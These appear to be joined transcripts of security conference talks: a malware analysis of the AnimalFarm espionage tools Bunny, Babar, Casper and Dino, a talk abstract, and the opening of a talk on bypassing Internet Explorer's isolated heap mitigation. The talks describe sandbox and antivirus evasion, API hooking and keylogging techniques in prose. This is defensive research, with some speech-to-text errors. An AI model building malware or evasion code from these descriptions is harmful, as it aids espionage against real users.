is the order in which we found them. So the first thing that we uncovered was NBOT, or TFC or NGP, or we're not really sure how to call it malware. It contains a lot of strings in NBOT. It's, you know, service bots, which are quite simple and were compiled in about 2010. Which were not interesting at all, but they led us on to find the bunny malware, which was a lot more interesting, which was probably compiled around 2011. Or we actually know that it was spread in 2011. The next thing we found after bunny was bunny Babar. So yes, we uncovered Babar. French media was very, very happy about funny having someone to speak about Babar, the malware, that Babar was not the last thing we found. So after Babar, there were more cartoons popping up. And we eventually uncovered Casper. Casper is reconnaissance malware, which was spread in Syria, interestingly, through a watering hole attack in 2014. And not even Babar was the last thing, but the newest cartoon character that we found was Dino, which was spread around the same time, in the same area. So today, we're going to present about all these different characters. All right, as I start, how did we get onto this malware? The first thing we had, as I mentioned, was NBOT. And you see on the slide, I'm very sorry that I put an Ida Pro screenshot on the slide. I was told I shouldn't do this at RECON, but I still dare to do it, just to show you how simple the bot itself was. So obviously, it is a NAL service. It's like flooding all sorts of things. And it had these strings and clear text in there. So we have the NAL service bot, which comes pretty clear text, or let me call it a plain binary, uncrypted, unpacked. And I should say I come from the Antivirus scenes. I started off as a junior analyst at an Antivirus company, and I would have been very excited to see such a bot because it could create great signatures. What happens is like, if you try to build a botnet and you spread your bots, you might want to prevent someone from detecting all your bots with one single signature, just an idea. So this was quite interesting. But what was more interesting is that these bots had CNC servers that were singled by Kaspersky. And Kaspersky, under Singles, they provide an email address where you should write to if you have any questions about why this specific domain is singled. So I wanted to write an email there and say, hey, why are you singling my CNC server? And I was very surprised when, within the next 20 minutes, I got an answer from their team. Like, oh, this is interesting that you have this. I'm not really sure what it is, but could you tell me where you have the binary from, which computer was infected, who owned that computer, which company was the computer in, and how did you get onto this binary? And I was like, oh, this is fishy. So this was the first impression I had. And after a while, I asked him around, what is this kind of bot? A friend of mine came up to me and told me to look at something else. Like, there were other binaries with like similar structures in there and using similar techniques, being quite different. Anyway, so this was the first step towards the next cartoon, which was then Bunny. So after digging a bit, I found a dropper which came with a PDB string embedded telling me the project named Bunny 2.3.2. And I'm not specifically a fan of bunnies, but I thought it's very cute. And digging into the binary, I found out it's a very interesting malware. Digging further, actually based on the hashes of these binaries, I found out they're already mentioned online on a blog, which documents a spearfishing campaign that happened in 2011. So I went to ask the blog writer, like, how did you get these binaries and what kind of spearfishing was that and how did it work? And he didn't really give me any answer for I don't know why he didn't say any details about the spearfishing campaign. But what he said was, oh, yeah, these binaries, I haven't looked at them closer, but I was told it's French government spreading them. And I was like, oh, wow. Okay, this is even more fishy. So this was the first time I heard about the French government. Anyway, what is Bunny? So Bunny is a scriptable bot. Bunny incorporates a Lua engine and can download and execute Lua scripts to execute the Lua with the engine and instrument the C++ code of the binary. Let me show you how this is built. So Bunny is a beautifully multithreaded as a main thread, which is busy with command partying from the CNC server and execution of the scripts. These scripts will be loaded from different text files, which are placed on this. So the command parsing would do nothing else than like parse one file after another, load the Lua scripts in there and execute them in dedicated threads. So the enter bot was allowed to execute Lua scripts. These Lua scripts would be dumped into the text file by different hero threads. This is not the term that I came up with. This is a term which is defined in the binary. So the binary calls its worker threads, literally hero. Of these hero threads, hero zero is one that doesn't actually download and dump scripts. I was never too sure what the purpose of hero zero is. But the other three are busy with fetching scripts once through HTTP, like plain download of scripts. Hero three would load scripts from a file, which was downloaded from an HTTP server. And hero two interestingly would place cront tasks. It would configure tasks to be scheduled at specific points in time. Also the cront tasks time result for me that was defined by the binary authors. Anyway, so this is basically the workflow, download scripts and execute and inject them to the Lua engine. At the same time, the commands received from the CNC and the actions the bot would take would dump to the text file. This text file was managed by a thread called back file thread. Altogether, the bot of course had a performance monitor to execute the Lua. What is it though with the Lua threads? So there are some theories. With Lua, Lua is originally designed for computer games. With Lua, you can inject behavior into a computer game like bombs explode or let things happen all of a sudden unexpectedly in the other context. So my first theory is that the bot downloaded the scripts to instrument its own code and to inject behavior through text files into the binary. So what Bunny would do was not download other binaries as plugins or to execute behavior, but download Lua scripts to instrument its own code and change its behavior on the fly. Another interesting thing is that by downloading Lua scripts, you're not actually downloading binaries. You don't have to execute binaries on disk. You don't create a new thread every time you want to inject behavior. But it should only download the plain text file, which is rather small and doesn't catch any attention, and can still inject any behavior you want to give in binary. So that was pretty smart. What was also interesting about Bunny was that it was pretty like, I call it the slight rabbit armoring. It wasn't really armored, but it came with some interesting anti-analysis tricks. What was interesting for me is that it had a lot of them, which describe their uncommon for the usually PT malware I see. Anyway, altogether, they were pretty simple. Let me just count them down. So it did an emulator check. They would check the module path of the executed module if it contained any strings indicating an emulator. I think Paul is going to explain this in more detail later. It would check the directory name from which it was executed to see if it was the directory the dropper had created before, see if the payload was really dropped by a legitimate dropper. This might seem simple, but it works in most sandboxes to evade execution. It would change the timestamp of the payload to the system installation date. It would check if the number of running processes was bigger than 15, which is not the case if you run in a simple emulating environment, like for example, an antivirus engine emulator. It would check if time APIs were hooked, which happens if you turn on plug-in like I just stopped and hook the get-tick-count API. It would obfuscate a subset of APIs. It would load the subset of APIs dynamically indicated by hash in the binary. Interestingly, this hashing function is really simple, is revertible, and is shared through at most of the cartoon malware. It's also Paul who is going to speak about this later again. What was smart is that they don't load all the APIs dynamically, but only the ones that indicate the final behavior. APIs for interaction with the registry or APIs for interaction with the file system were all obfuscated. I think this was for evasion of analysis, but just only looking at the import table. It's a pretty simple trick, but might be effective in some cases. Another thing was the infection strategy. Is that me? The infection strategy, which would check which antivirus was installed on the machine and then decide on a specific technique and whether to inject an already existing process or create a new process and inject the payload there or whatever, which requires a lot of knowledge of how dedicated antivirus engines work and what kind of infection strategies they would try to work for. Last but not least, which I was not sure if it's a bug or a feature, was an evasion trick for sandboxes where the final payload would not be loaded without a reboot of the machine because the dropper lacked any functionality to invoke the payload. I have discussed this a lot with other people. It's pretty effective against a sandbox because you would really need to reboot the machine. The persistence mechanism was through a registry, so there was a registry key which invoked the bunny loader, but the thing is the bunny dropper would not delete itself after dropping the payload. The bunny dropper was executed, would place the payload, would create the registry key and then nothing would happen until the user would reboot the machine. Then the payload would be invoked through the registry key and delete the dropper. I'm not really sure if this was intention or if they just forgot to invoke their payload. Anyway, this was the bunny. After bunny, we were really excited. This is Cole Malware. We found out that there was something else that had been documented in the media already. There was Babar. The bunny, Babar, the guy in the US said there's animal names in the malware. We thought, okay, we have to be searching for Babar. Finally, really, we found Babar. I don't know if everyone's familiar with Babar. Babar is a French cartoon character. It's an elephant. That's been first mentioned by LeMond in an article in 2014 where they're speaking about the mentioned Snowden slide. They're talking about Babar. I personally called it my pet, my persistent elephant threat. Babar is a Spionage malware. It does key logging. It steals screenshots. It does audio captures like everything a good Spionage tool should be doing. That's this by thoroughly invading the Windows machine. Let me tell you in advance, Babar is not like a really sophisticated malware, but it does its job very well. Babar would work through a local instance and two child instances as a backup and hook APIs in remote processes to steal data which would enter these APIs on the fly and excret this information to its CNC server. Let's have a look. I prepared another beautiful slide lining at the operation. Babar is a DLL which is loaded through a registry key which invokes to registry R32. EXE will then inject itself to a process running on the desktop which is randomly chosen, which is the main instance, which will then go on to infect two child instances. These are used as backup only. So if the main instance in an infected process dies when child takes over and creates a new child, to guarantee persistence. So this main instance would take over most of the functionality. It would do key logging. It would steal data from the clipboard. It would steal names of running processes. It would steal names of desktop Windows that are open. Nothing really exciting. But what it also would do was, as I mentioned, hook into other processes. So the main instance would load itself, the DLL, into other processes through a global Windows hook and hook itself into the message chain of the running application to be able to do its inline hooking. So the process of interest were identified through the configuration. So if, for example, Microsoft Word was opened, the Bani DLL would take action and place inline hooks on dedicated APIs that was interested in. The API hooking was performed by the Microsoft Detours Library. So I'm a rather young reverse engineer. I haven't heard of detours before, but other people were laughing at me because detours is like from 1999. So yeah, our authors are nostalgic. So as I mentioned, it works very well. Let's have a closer look at how that works. So first of all, what I found interesting was the process invasion that Babar performed with loads DLL, as I mentioned, and injected to running processes, which used a section object to deliver information to the child instance, to the infected instance, containing the pipe name, the number of instances, and the export name to be called. It would then allocate memory in the target process and copy a stop function there, which was used to create a remote process, which would then load the Babar DLL and call the indicated expert name. But this technique, yeah, and then the DLL would run happily in context of the infected process. But this technique, Babar could invoke any of its exports by just injecting its DLL to another process and then calling any of the exports it had and thus calling the dedicated functionalities. This was, for example, how the CNC communications performed. The CNC communication is located in one specific export. So if a bar would want to communicate to its CNC server, which has created another child instance with a call to the CNC functionality, hand over the data, which should be communicated, and then run the DLL in context of another process. The second thing I thought was interesting was the simple, was the keylogger. So the keylogger Babar used was like the most simplistic keylogger one could implement. It would create an invisible message-only window, which would then, in its message dispatching, create a raw input device, which was then used to filter for input window messages. I wrote the specific settings here on the slide. It would then call, get our input data to receive the data, the input device captured, and then just translate the virtual key to a character and write it to a file. So this is probably the most simple keylogger you could write. You can find this documented on a code project article, which is titled, something like, yes, Simplistic Keylogger or Simple Keylogger. So congratulations to our authors. The third thing, and the last thing I actually wanted to describe was how Babar hides in plain sight and tries to evade being seen, which is the, yeah, the user-land root-kit functionality, or actually, never mind, user-land-root-kit. What does it mean? Babar hooks target functions, or hooks function calls to specific target functions, which were APIs in our case, and would do this through the detours library, would literally use code from the detours library to place inline hooks. How these performed? So Babar would overwrite the target function, the first few bytes of the target function, to point to a detours function, which would perform the malicious functionality. So in the detours function, Babar would add the steal data, which was going into an API, or steal data, which was returned from an API, in order to then, either before or afterwards, call the legitimate API to hide the hooking and to deliver the right return value to the calling process. So from the source function, the execution flow would jump to the detours function from this functionality, and then go back to the trampoline function, which contained the overwritten bytes from the target function. So the trampoline function would make sure that the function call, the final function call, could happen, after all, and would then hand our execution to the rest of the target function, which would then return to the detours function, and from there, back to the caller. So after all, this was silent stealing data at runtime from a running process without the running process noticing it. This is called a hook. Babar would do this for internet communication, fire creation, and audio streams. These were the specific APIs it would hook. After all, Babar is a tool that does its job. It's not very sophisticated, and as we published about Babar, people were coming out asking us, do you really think, is it anything like Regan? Is it anything really, really sophisticated? And I was dying when I saw a quote from Paul when he told people that Regan and Babar, if you compare them, keep in mind that a PISCHO is not for the day-to-day life. And just, you're listening to me? Yeah. For information, French media covered a lot when we published our papers, and the first question of all journalists that called me was, does it French government? First question. And the second question, I don't really know why, but all the journalists asked me if it's more complex or less complex than Regan. And a lot of journalists on the French newspaper make some joke about the potential French developer because it's less evolved than Regan. So that's why I write these things. Okay. So the next one we found is Casper. So as Marion said, unlike Babar and Bunny, Casper is simply a reconnaissance tool, a first-stage malware for the group. And among the sample we got, there is a DLL where the developers forgot to remove the original file name from the export table. It has been developed in C++ like most of the animal farm malware. And it has been deployed at least in April 2014 on a few people in Syria, thanks to a Flash Zero Day exploit. And interestingly, the exploit, the Casper binaries, its CNC server, were all hosted on one machine in Syria that belonged to the Syrian Justice Ministry. But we believe the animal farm, the group behind that, which is called animal farm, as you may know, simply act the website to use it as a storage. So the first thing that Casper does when you rise on the machine, it's decrypt its configuration file, which is an XML file. And it contains in particular instructions on how to deal with antivirus software that could be running on the machine. And they call it a strategy. And you can see here at the top there is a strategy tag that defines the default strategy. And inside this strategy tag, there are some AV tags defining strategy for specific antivirus software. And so at runtime, Casper checks which antivirus run on the machine and applies the corresponding strategy of a default one. And so what's a strategy? It's basically a set of parameters that define either how to perform certain actions on the machine or whether certain actions should be performed. So for example, the autodale parameter defines how the Casper dropper will remove itself from the machine after having dropped the payload. And you see here that for Bitdefender, the autodale parameter is set to API, which means this action will be made true according to the Windows API function, move file XW to register a file to be deleted at the next startup. But if you run AVast antivirus, in this case, the same parameter is set to WMI, which means the same action will be performed differently. And in this case, it will be through a command line that will be decrypted and then executed into a new process. The command line is just a loop that tries to remove the dropper until it works. And the new process is created through the WMI request. So that means that the Casper developers have an in-depth understanding on how each antivirus product monitor the machine. And they implemented bypass for each one of them and for each noisy action that Casper has to do, which is kind of a lot of effort. The next thing that Casper does, it receives some commands inside the configuration file. And in particular, there is the install command to drop the payload and make it persistent onto the machine. There are two versions of the payload provided, one for 32-bits machine in the x86 tag and one for 64-bits machine. An interesting detail here I would like to insist on is that the Casper dropper gives an input parameter to the payload. And this input parameter has to have this exact specific value for Casper payload to run normally. And the way it is implemented is actually pretty subtle. It's not a simple check at the beginning of the execution of a payload. No, it's done in this function in the Casper payload. It's basically the function in charge of finding the API address in memory. So it's a get proc address, basically. But they don't use the name of the API function. They use a hash, a four-byte hash calculated from the name. And interestingly, the first thing that this function does is absorb between four bytes after that constant, a variable, I named checksum, and the hash given an input to a function, the hash to look for. And where does the checksum come from? It's the result of a few arithmetic operations done on the input parameter of Casper binary. So let's say the checksum is not equal to the output at constant. Then the XOR will not be equal to zero. And the hash to look for defined in this line will not be equal to the hash given an input to the function, which is the correct hash to look for. So in this case, this get proc address will not retrieve the correct API function because it does not look for the correct hash because it didn't provide the right input value to Casper payload, such that the checksum is equal to the output at constant. So we have to provide to Casper this exact value, such that it will execute normally. And if you don't do it, you will get a random crash because at some point, it calls the address retrieved, and it's not the correct address. So there is a weird crash inside Windows API. So that's a technique to make the analysis of a payload without having the dropper difficult because you have to find this exact input value such that this line will have no effect. So once Casper is executing normally on the machine, it builds a very detailed report on the machine, and you can see an extract here. And this report is sent back to the CNC server, which can provide in answer XML file once again, containing commands. And in particular, they can deploy a second stage binary at this state. We don't have any second stage binary because the CNC was down when we started investigating on Casper. So that's it for Casper. And now it's time to talk about Dino. But as far as we know, the first time that Dino is publicly documented. So Dino is more in the category of Babar and Bunny. It's an espionage backdoor, a second stage malware. It has a lot of features, including the ability to do some complex file search request. The operators can ask the Dino malware, give me all files with doc extension whose size is greater than a certain amount of bytes were modified in the last few days. And that's probably the end goal of Dino, exfiltrating information from the target. We got only one sample of Dino, actually. And this sample was deployed in Iran in 2013. It is developed in C++ with a clean modular architecture. There are no RTTI inside the binary, but there are a lot of verbose error messages, like this one, for example. And once again, they forgot to remove the original file name from the export table. So I read the list of modules that we got in our sample with the names given by the developers. And so first there is a PSM module which maintains an encrypted on disk copy of all the modules of Dino. Then the core module contains the configuration. The CONTAP modules allows the operators to schedule tasks with a syntax that is almost exactly the same as the CON UNIX command. Then there is the FMGR module to upload and download files onto the machine, whereas the CMD exec and CMD exec queue are managing the execution of commands on Dino. And finally, they got a module that they call AMVAR that store Dino-specific environment variables. So now I'm going to dig a little bit into technical details in Dino. So one of the important things when analyzing Dino was to understand a custom data structure that they use everywhere, basically, and in particular to store the content of the modules of Dino. The developer called this structure a data store, and that's a map from string to values. These values can have eight possible types. Some of those types have a fixed size, like byte, short, word. Some of those types have a variable size. And the type names here, they also come from the developers because in Dino there is a function to print a data store nicely, and it prints in particular the name of the types. So for example, there is the result of printing the data store that is inside the core module, and it contains the configuration of Dino. So that's really the output of the print function that is inside Dino. So you can see on each line the key, the value associated with the key and the type of this value. So how are these data stores implemented actually? As I said, it's a map, and they implemented it like a simple hash table. So in memory, in a data store object, the first field is a pointer to an array of four entries, and each entry starts a linked list containing key value pairs. So in order to access to a key, there is a hash function that is used. You hash the key, you get a number, take the number, module of four, it gives you the index in the array where the linked list possibly containing your key starts. So for example, in this simplified view, the hash of the key IP is three, module of four, so the linked list containing the key IP starts at the index three. They fixed the number of buckets to four, the size of the array to four, which makes this data structure not really efficient because there are a lot of collisions, a lot of key with the same index in the array, and the linked list grows really fast. Another thing to know about data store is that they can be serialized, and they have some custom format to serialize the data store. It looks like this, a serialized data store. It begins with a magic D word, DXSX in begin Jan, then a suspected version number, then the number of stored items, and then the serialized items themselves, first the key, its length, its name, and the actual value, its type, and the value. The serialized data store are used in particular in the PSM module that maintains the up to date copy of all the content of the modules. And it is done inside an encrypted file, and this is by the way the SC4 key they use to encrypt the file, so we can admire the lead speak of the developers. And so, yeah, that's it for data store. An interesting thing also inside Dino is a module that the developers call Ramefs. It's also present in other animal farm binaries, and like the name implies, just to conclude on the data store, I think that the store is a custom data structure, but if you recognize it by the way, I would be very happy to know. So Ramefs, like I said, it's like the name implies, it's a temporary file system that can be mounted in memory from an encrypted blob that is initially inside the configuration. So once it's mounted in memory, Ramefs will remain stored always in encrypted chunks of data. So it's a set of encrypted chunks of data. And the chunks will be decrypted only on demand. And in our Dino sample, Ramefs initially contain one file that the developers call the cleaner file, and it contains instructions on how to remove Dino from the machine. So to give you an idea, there is the code that is responsible to execute the cleaner file. So when the operators want to remove Dino from the machine. So the first thing it does is to look for the name of the cleaner file which is inside the configuration. And you can see at the bottom that once again they provide very verbose error message. So we know basically what's the purpose of the check from the error message. So if they found the name of the cleaner in the configuration, then they look for the cryptographic key to decrypt Ramefs initial blob in the Dino configuration. And you can see that they call this key the passphrase. So they are really in the file system mindset. And then if it works, there is the actual mount operation which is basically creating a C++ object in memory that contains the file system. And if the mount works, then they execute the cleaner file which is inside Ramefs. So how is Ramefs actually implemented at this low level? So in memory we got this Ramefs object and as I said, Ramefs is a set of encrypted chunks. And these chunks are inside a linked list for which we got an add pointer and a tail pointer inside the Ramefs object at the offset B8. So the add and the tail pointer points to the beginning and the end of this linked list. And each item of this list is actually an address of the chunk header. The chunk header is a structure containing in the first field the address of the chunk. And in the second field, the key that serves to encrypt and decrypt the chunk. So each chunk could be theoretically encrypted with a different key. And basically, and finally the chunk content address points to the 512 bytes of encrypted data. So that's the way Ramefs looks like in memory, a set of encrypted chunks that you can access from a linked list. This is not even the file system structure. The actual file system structure is inside the first chunk. So they would decrypt this first chunk when they mount the file system and store the structure inside the beginning of the Ramefs object. This is the only part that stays always decrypted in memory. So the rest of the file system is always encrypted and decrypted on demand only. Interestingly, we got the name given by the developers for three fields in this structure because also because of some error message in the code. So we know the developer called these three fields here, the file list, the free chunk block list, and the free file header list. The file list is the only one that is non-empty at the beginning. And like the name implies, it's a list to all the files stored in Ramefs. And in this case, we only got one file, the cleaner I just talked about. So we got the name in the structure, a.ini, and the content of the file. The content is a custom command to uninstall Dino from the machine, thanks to the dash view. So basically, Ramefs also come with a custom command under. And here are a few commands that they can execute inside Ramefs. The install command I just showed you, the extract command to take a file into Ramefs and put it onto the real file system, two commands to execute or inject five store into Ramefs, and a command to kill a running process onto the machine. So we can guess that this Ramefs thing is really a disposable execution environment for the developers. It always stay encrypted. It's really hard in terms of forensic to understand the structure. So that's probably the purpose. And my question is, is this thing custom? Did they copy pasted from somewhere or not? I couldn't find any implementation like that on the Internet. So I tend to believe it is custom, in particular because of these ILOVL characteristics. All the file names and file content are in Unicode. The maximum file name length is 260 characters. The unantiped chunks, once they got decrypted, the chunk, they are manipulated as chunks of 540 bytes this time, which is not so common as far as I know. And I couldn't find any metadata on files. So they don't seem to have any timestamp of last creation, last modification time, or things like that. So I believe Ramefs is custom. But once again, if you recognize this thing, I would be happy to know. And now. So we spoke about a lot of different malware sample extra. And now I'm going to try to explain the different links we found between each of them and similarity and why we think it's the same or more or less the same group of developers behind. So the first thing they mentioned is API obfuscation. So basically, every carton uses the same techniques to obfuscate API. They load the library in this example, connect it to the DLL in memory and take the list of export function and generate the hash of each exported function to find the wanted hash. So we found two different algorithms. Here is, for example, the algorithm used by Bunny and Casper. So it's really easy. It's simply a whole and a gzor. I put a Python script and an example of the hash of create process function. So another similarity between a sample is a way of antivirus detection. On each cartons, the developers use WMI provider to find the antivirus installed on the system. So they use root security center or root security center too on a new year window system. Make a select stuff from antivirus product to get the antivirus name and installation data extra. And in fact, they use the first name of the security product. For example, if you look at gdata, it's only the g and not gdata. It only takes the first word. And they make a charnit and store the char inside of the binary and check if the installed antivirus is this one. Just for information, the free last char, we didn't find which antivirus is detected. We don't find the name. So if by any chance you have an idea or have a huge database of char, maybe you could help us to have a full list of detection. So another fun thing about the carton sample is the emulator detection. So if you look, something really fun is the last one. If you look, ea, f, y, et cetera. So it's a random name generated by Kaspersky product. But the developer arcoded the random name inside of the binary. So I think he make a test, has this name and arcoded this name and didn't check a second time. And you've got a list of other random name potentially generated by Kaspersky to start the emulator. Is this working? Can you hear me? Awesome. At this point, I'd like to thank a researcher who wants to say anonymous who dedicated his spare time on reverse engineering antivirus emulators. And coincidentally, he saw my paper on Bunny and said, oh, the test upstream. Wait, I saw before it's Bitdefender. But the other string, that doesn't make sense, like the Kaspersky, but then he sent me this list of names that he expected from because Bersky emulator and said, this is a random string. This shouldn't be hard coded. I thought it was hilarious. Another link and similarity between sample is the internal ID of malware. If we look at this number, it seems to be really similar. For example, on the CSEC slide, the Baba sample mentioned is 08184. We don't have it. So, but on the sample we analyzed the Dino, Bunny, Baba, etc. The naming convention seems to be more or less the same. So, it's purely a speculation, but maybe the two first numbers match the year of creation and usage of the malware. On the CSEC slide, it's 2008 and 2011, 2012, and 2013 for the other sample. But we don't have any proof. It's simply speculation and maybe it's the ID and the version of all the campaign ID after or something like that. I don't know. Another link between each sample is of course the naming convention because all the names we mentioned, Baba, Kaspersky, Bunny, etc., is the internal name chose by developers. It's not our naming convention. So, on every case, they chose more or less cartoon characters to identify malware. Another link between each sample is a really, really bad English usage, over the mine, you may see. So, for example, if you look at the string of the registry key, you have a mistake in the middle and Mario have a thing about these errors. I think you can mention it. Yes, so the typos and the binaries were hilarious. If you look at the yellow marked, it's a commercial negotiated string. You realize there's like one letter that should be kind of different. Anyways, I was looking at the Bunny binary and initially I saw these strings, of course, and I was like, okay, this binary does something with the registry key and maybe something with IPsec because it's like accessing the Microsoft IPsec key, whatever. I have no idea of IPsec. So, I was looking how Microsoft interacts with IPsec and what the binary could do with the registry when modifying IPsec in there. And then I realized where there is a name. It's written wrongly. This shouldn't work, but when the binary ran, it would work. So, I thought maybe it's trying something and has a bug in there. And then I realized that what is writing to this registry key is actually it's configuration and not anything related to IPsec. So, if they wouldn't have placed a typo in the name, I would have maybe been researching IPsec forever, but because he placed a typo, I saved time, which I found was great. And another, even a stronger link between them is we found a CC, horizontalrism.com. It's a travel agency in Algeria, I think. Yeah, it's in Algeria. And we found this directory listing on the CC and we were able to list every file and directory. And we found a directory for several different malware. For example, the D13 is the directory used by Dino, malware. And 13 is the version of Dino. And on the same server, we've got BB, 28 for Babar, and we've got TFC for Tafakalu. It's one of the samples developed by the group. And just for information, on the Caspersky report, you have some information about Tafakalu. It's an occident word. That means it's hot, basically. And it's a link to French developers, but I'm French and I never heard this word before, the Caspersky article. So, the link with French speaking, for me, it's a little bit exaggerated. And that's why I'm going to speak about attribution now, about this case. And a lot of article people, et cetera, point French developers. And they decided to, for me, clearly manipulate information to point French developers. The Tafakalu stuff, for example, or the TT. If you look at the slide, TT is diminutive for Thierry. Yeah, maybe, but not convinced. And a term, that means small people. I never heard the usage of TT in French to identify small people. So for me, it's not really true. We got the idea that Canadians maybe don't speak real French. Canadian French. So maybe people at the back cannot read the graph, but I decided to list every CC and check which country is used on the CC. Typically, we found a Syrian website, Iranian website, American website, Burkina Faso. The dot BF is not for Burkina Faso. Hong Kong, Saudi Arabia, Egypt, Turkey, Niger, Morocco, and Ukraine. Basically, on the CC, we identify compromised websites like the Syrian government website. We found a university company, and sometimes it was a fake website. And not always, typically, not for the Syrian government, but most part of the CC was WordPress website. So maybe the developers use some vulnerability on WordPress to drop the CC panel, et cetera. There was another interesting story to the CNC. So one of the bar binaries has a CNC server which is hosted on an Algerian travel agency website. So I didn't think this is anything suspicious, but one day my boss poked me on this website and said, like, he's Algerian, and he said, like, there's no travel agency in this place in Algeria. So he basically said, in Algeria, you don't really travel nowadays. There's no need for travel agencies and the location, like the village, where this travel agency says it's located. He doubts that there's a travel agency there. And even if there's a travel agency, it's unprobable that this travel agency hosts its web server on the United States' host. So we genuinely believe that these websites are fake. So here is the map of location of each CC. So for Chinese, it's only Hong Kong, but I cannot simply draw Hong Kong on the website. So that's why it's all China. Yeah. So I explained that some report point on French and on bad argument, but we found some more relevant French hints. For example, on the HTTP request generated by the malware, the accept language is set to FR. And another example is the compiler set up language is set to French as the second screen. And another thing is on Casper, I think, on Dino. The developers did not remove the path of computation of arithmetic library and arithmetic. It was written in French and not in English with a C at the end. So it's, of course, all of this element can be forged and I can set up my compiler in a lot of language and manipulate the data, but it's simply a fact for us. And finally, the other information for attribution is the CSEC slide where the agent point a French intelligence agency for the Snowglobe campaign. Yeah, at this point I'd like to say a short thank you to the Canadian intelligence agency for providing this slide. I'm very sorry. Very sorry. They actually got leaked, but they have this a lot in our reach. Yeah, but everybody knows that attribution is not so easy. And journalists that covered the case in France in particular are really good for bad attribution. For example, a newspaper said that Jean, this French guy, is a Canadian guy, too bad. And for example, Marion from Australia, a journalist, a French journalist, doesn't really know the difference between Austria and Australia. So he makes a mistake. You may be one now, but usually we all sense we have the problem that we're exchanged with Germans, which is like, it's not directly an insult, but it is an insult. And calling us Australian is even worse. I mean, this is a different continent. So yeah, attribution is not so easy. So thank you for your attention. Just for information on the final slide, we will provide to the organizer. You will have a link of all our articles, a list of hash of the analyze sample, et cetera, et cetera. And yeah, that's all. If you have any questions, you can ask us now or later at the bar. Thank you.
|
For some months now, there were rumors of cartoon-named malware employed in espionage operations. It actually started in March 2014 with a set of slides leaked from the Communications Security Establishment Canada (CSEC) -- Canada equivalent of NSA. CSEC then described to its spook friends a malware dubbed Babar by its authors, which they attributed "with moderate certainty" to a French intelligence agency. The group behind Babar is now commonly referred as "AnimalFarm" in antimalware industry, because Babar was only a small piece of a much bigger puzzle. Since CSEC slides' publication, a group of valorous adventurers, animated by the thrill of understanding complex malware operations, has been relentlessly following AnimalFarm's trail. Along its path, this group found several pieces of AnimalFarm's arsenal, for example stealthy Casper, exotic Bunny and even big ears Babar itself. This presentation aims at presenting the results of this group's research. In particular, we will provide a global picture on AnimalFarm's operations, and also delve into technical quirks of their malware. We will also explain how we assessed the connection between their various piece of software from a code reverse-engineering perspective, and what are the technical hints we found regarding attribution.
|
10.5446/32804 (DOI)
|
Alright everybody, this is abusing silent mitigations, understanding internet explore, weaknesses in internet explorers, isolated heap and memory protection mitigations. We've got a lot to cover so we're just going to dive right in. So today we're going to go over a comprehensive set of research we did in mid-2014 related to the isolated heap and memory protection mitigations that were introduced to make UAF exploitation harder on internet explorer. It'll cover several attack techniques against isolated heap, some surgical tools to use against memory protection along with details over the ASLR bypass that was generated using memory protection. Then we'll follow it up with some, with the recommended defenses that we provided Microsoft. This research was awarded $125,000 from Microsoft's Bounty Program. It still is the highest payout from the Microsoft Bounty Program. It also included the first payout for the defenses side of the Bounty Program and we're going to go over all of those details today. So a quick overview, we all work for HP Zero Day Initiative Program. It's the world's largest vendor agnostic bug bounty program. We focus on purchasing vulnerabilities from researchers all over the world. We focus on getting those bugs fixed. We research advanced exploitation techniques. My name is Brian Gorance. I actually run the Zero Day Initiative Program. I spend most of my time doing root cause analysis on cases that come in doing internal vulnerability discovery. I also organize the PONDA own hacking competitions around the world. Because of those jobs, I get to work a lot with HP's legal organization, especially with the Wastner and stuff like that. Doing PONDA own is a lot more fun than it used to be. And the introduce Abdul. So I'm Abdul. I'm a security researcher working for ZDI. I've been working for HP Security Research for the past two years. And I do a lot of root cause analysis and bug discovery. Simon? Hi, I'm Simon Zuckerbrunn. On Twitter, I'm Hex Kitchen. I'm with ZDI. I've been with them for a little over a year. I do a lot of work with Internet Explorer. Yes. So it should be no surprise to anybody in this room that use after free vulnerabilities were a very popular choice for attackers who were targeting government websites and people who were visiting those sites and using them in watering hole attacks. But what you see here on the slide is a bunch of CDEs that were being used publicly or known about publicly. I mean, and really something had to be done. Every single month, it seemed that new attack was coming out that was leveraging a use after free and Internet Explorer. And finally, Microsoft did do something in mid-2014 to make attacking use after free vulnerabilities a little bit harder. And as a result, it seems that attackers have shifted away from use after free and Internet Explorer and are now focusing on flash vulnerabilities. So what exactly happened? Well, in MS-14035, they introduced isolated heap, which Abdul will go over. And the month following that, they introduced memory protection, which was a nice introduction to Internet Explorer to make use after free harder to exploit. The side effect that it had really was it made, i.e., fun to research again. We were receiving a lot of use after free vulnerabilities into the Zero Day Initiative program. And it was pretty much, you know, you hit the website and use after free happens, relatively easy to analyze, relatively easy to exploit. And this gave us, made it more fun to actually go and analyze those cases, made it a little more complicated. So this is the first time that we've ever actually like shown some of our submission trends into the program. And you can see we're kind of over 2012, 2013. You know, we've got, you know, in the teens kind of coming into the program every month, vulnerabilities into Internet Explorer. And we see a spike in early 2014. And this is because researchers all around the world were developing DOM fuzzers and basically sending their output to us for purchase. And so we kind of, for several months there, we're doing about 40 cases, high 30s every month analyzing, purchasing and submitting to Microsoft. And you see in mid 2014, the, a kind of a drop, and that's when isolated heap and memory protection came out. And we've kind of leveled off around 25 Zero Days in IE, coming through our program every month. So it keeps us busy. IE is one of our main, main vulnerability sources. Kind of talking about the research timeline a little bit before we dig into the attacks. You can kind of see all the key dates related to the research. I think some of the more important dates is we had the isolated heap of proof of concepts generated basically in under 10 days post the patch. Same with the surgical tools that we're going to use against memory protection. In the cases where it can be used, we're developed in under 10 days. We had our first working ASLR bypass for against memory protection or using memory protection in early September. We were awarded the $125,000 in November. And we kind of waited to disclose any of the details while we worked out payments to charities. We donated all of the money that we were, we won from the Bounty Program to three STEM organizations to encourage research and engineering. And we made the public announcement in February. The, in April, Microsoft came to us and said that they would not fix the issue, issues that we've discovered and would not be using any of the recommended offenses that we provided. So here we are sitting today at Recon, releasing all the details and all the proof of concepts that we've provided. So we'll talk about where to get all those at the end of the presentation. And so I'm going to hand it over to Abdul. He's going to go over all of the research related to isolated heap. So isolated heap was introduced in June 2014. So back then we noticed that there's a new heap created with a heap created API, Windows API. So basically the main purpose of isolated heap was allocating a lot of DOM objects, moving them to an isolated region, basically providing some kind of separation of DOM allocations against other type of allocations. This was really interesting from an exploitation point of view because it made things hard harder. As the classical ways of overriding freed objects like using strings and stuff like that would not apply anymore to a lot of DOM objects because they have been isolated, moved to a separate heap. And the classical string allocations are kept in the process heap. So basically just like any other mitigation, isolated heap is not perfect. Basically it does a good job by isolating certain allocations, but at the same time it allocates all the DOM objects in one heap. So basically an attacker can free one of these objects and then override it with whatever he wants, whatever type he wants. So basically this makes it clear that there's a type confusion issue 